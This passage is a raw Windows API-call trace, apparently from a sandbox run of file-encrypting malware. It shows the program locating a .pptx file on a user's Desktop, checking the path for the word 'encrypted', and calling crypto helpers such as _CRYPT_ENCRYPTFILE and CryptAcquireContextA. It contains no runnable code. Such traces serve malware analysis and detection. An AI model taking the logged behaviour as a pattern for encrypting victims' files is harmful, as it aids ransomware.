ftCreationTime.dwLowDateTime=0xf3f51b0, ftCreationTime.dwHighDateTime=0x1d5bfc8, ftLastAccessTime.dwLowDateTime=0x418c8390, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x418c8390, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0x3119, dwReserved0=0x0, dwReserved1=0x777648, cFileName="0CZNNBZljlBQ.pptx", cAlternateFileName="0CZNNB~1.PPT")) returned 0x7c20c0 [0030.542] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.543] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.543] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3f51b0, ftCreationTime.dwHighDateTime=0x1d5bfc8, ftLastAccessTime.dwLowDateTime=0x418c8390, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x418c8390, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0x3119, dwReserved0=0x0, dwReserved1=0x777648, cFileName="0CZNNBZljlBQ.pptx", cAlternateFileName="0CZNNB~1.PPT")) returned 0x7c20c0 [0030.543] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.543] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ClVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lVeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VeU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eU\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZNNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NNBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NBZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ljlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jlBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lBQ.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.545] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.545] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.545] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.545] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.545] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.545] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.545] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.545] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.545] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.545] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3f51b0, ftCreationTime.dwHighDateTime=0x1d5bfc8, ftLastAccessTime.dwLowDateTime=0x418c8390, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x418c8390, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0x3119, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="0CZNNBZljlBQ.pptx", cAlternateFileName="0CZNNB~1.PPT")) returned 0x7c2100 [0030.545] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.546] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.546] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.546] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.546] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.546] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.546] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.546] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.546] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.546] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.546] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.546] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0030.546] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.546] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0030.547] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.547] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.547] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.548] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.548] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.548] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.548] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.548] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.548] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.548] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.548] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.548] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.548] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.548] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.548] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.548] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.548] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.548] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.548] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.548] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 